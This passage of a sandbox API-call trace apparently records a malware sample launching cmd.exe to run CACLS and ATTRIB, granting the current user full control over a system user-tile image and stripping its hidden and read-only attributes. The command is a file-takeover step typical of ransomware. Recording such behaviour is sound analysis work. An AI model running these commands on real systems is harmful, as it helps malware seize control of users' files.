returned 0x409 [0182.967] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.967] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb74 | out: phkResult=0x20fb74*=0x0) returned 0x2 [0182.967] VirtualQuery (in: lpAddress=0x20fbab, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0182.967] GetConsoleOutputCP () returned 0x1b5 [0182.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.967] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0182.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.967] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0182.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.967] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.968] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.968] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.968] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.968] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.968] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0182.968] GetEnvironmentStringsW () returned 0x400308* [0182.968] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.969] GetEnvironmentStringsW () returned 0x400308* [0182.969] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.969] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0xb8, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegCloseKey (hKey=0x40) returned 0x0 [0182.969] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.970] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.970] RegCloseKey (hKey=0x40) returned 0x0 [0182.970] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886391 [0182.970] srand (_Seed=0x5b886391) [0182.970] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" [0182.970] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" [0182.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.970] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x401a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0182.970] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.970] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.971] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.971] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.971] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.971] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.971] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.971] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0182.971] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.971] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.971] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.971] GetEnvironmentStringsW () returned 0x402458* [0182.971] FreeEnvironmentStringsW (penv=0x402458) returned 1 [0182.971] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.971] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.971] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.971] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.971] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.971] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.971] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.971] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.971] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.971] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.971] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.971] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f8b0, lpFilePart=0x20f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f8ac*="Desktop") returned 0x18 [0182.971] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.972] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x400ae8 [0182.972] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0182.972] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x400ae8 [0182.972] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0182.972] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x400ae8 [0182.972] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0182.972] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.972] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0182.972] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0182.973] GetEnvironmentStringsW () returned 0x400308* [0182.973] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.973] GetConsoleOutputCP () returned 0x1b5 [0182.973] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.973] GetUserDefaultLCID () returned 0x409 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="1") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0182.974] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.975] GetConsoleTitleW (in: lpConsoleTitle=0x3f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.976] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.976] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0182.976] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0182.976] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0182.977] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0182.977] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0182.977] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0182.977] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0182.977] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0182.977] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0182.977] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0182.977] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0182.980] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0182.980] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0182.980] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0182.980] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0182.980] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0182.980] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0182.980] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0182.983] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.983] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.983] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.983] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.983] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.983] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.984] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.984] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.984] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.984] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.984] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.984] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.984] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.984] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.984] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.984] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.984] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.984] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.984] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.984] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.984] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.984] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.984] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.984] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.984] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.984] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.984] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.984] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.984] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.984] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.985] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.985] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.985] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.985] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.985] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.985] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.985] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.985] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.985] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.985] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.985] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.985] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.985] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.986] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.986] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.986] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.986] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.986] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.986] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0182.986] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0182.986] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0182.986] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0182.986] SetErrorMode (uMode=0x0) returned 0x0 [0182.986] SetErrorMode (uMode=0x1) returned 0x0 [0182.986] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x401e98, lpFilePart=0x20f1a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f1a4*="Desktop") returned 0x18 [0182.986] SetErrorMode (uMode=0x0) returned 0x1 [0182.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.987] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.993] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.994] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0182.994] GetLastError () returned 0x2 [0182.994] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0182.994] GetLastError () returned 0x2 [0182.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x402180 [0182.994] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0182.995] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0182.995] GetLastError () returned 0x2 [0182.995] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x402180 [0182.995] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0182.995] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.995] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.995] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.995] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0182.995] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0182.995] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.995] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.997] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 